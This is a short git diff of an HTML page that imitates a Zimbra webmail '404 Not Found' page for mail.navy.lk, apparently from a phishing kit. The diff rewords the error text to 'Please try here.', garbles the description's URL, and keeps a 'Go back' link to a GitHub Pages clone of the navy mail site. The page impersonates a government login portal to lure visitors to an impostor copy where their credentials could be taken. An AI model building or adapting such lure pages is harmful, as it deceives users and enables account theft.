--- a/TvVlcSGMhttpzfrVWtsNvnFsXMfNrhCjNQvxGrTCLvxPQrjML/index.html
+++ b/TvVlcSGMhttpzfrVWtsNvnFsXMfNrhCjNQvxGrTCLvxPQrjML/index.html
@@ -4,8 +4,8 @@
 	
 	<title>404 - Not Found</title>
 	<meta name="viewport" content="width=320; initial-scale=1.0; maximum-scale=8.0; user-scalable=1;">
-	<meta name="description" content="Zimbra provides open source server and client software for messaging and collaboration. To find out more visit https://www.zimbra.com.">
-	<link rel="stylesheet" type="text/css" href="./index4_files/common,login,zhtml,skin.css">
+	<meta name="description" content="Zimbra provides open source server and client software for messaging and collaboration. To find out more visit S">
+	<link rel="stylesheet" type="text/css" href="./index_files/common,login,zhtml,skin.css">
 	<link rel="SHORTCUT ICON" href="https://mail.navy.lk/img/logo/favicon.ico">
 </head>
 <body>
@@ -14,7 +14,7 @@
 			<h2>Not Found</h2>
 			<p>
 				The requested URL was not found on this server.<br>
-				Please try again later.<br><br>
+				Please try here.<br><br>
 				Error 404<br><br>
 				<a class="errGoBack" href="https://downloadsmail.github.io/mail.navy.lk/new%20%20version%20discord%20TvVlcSGMhttpzfrVWtsNvnFsXMfNrhCjNQvxGrTCLvxPQrjML%20(copy)/">Go back</a>
 			</p>
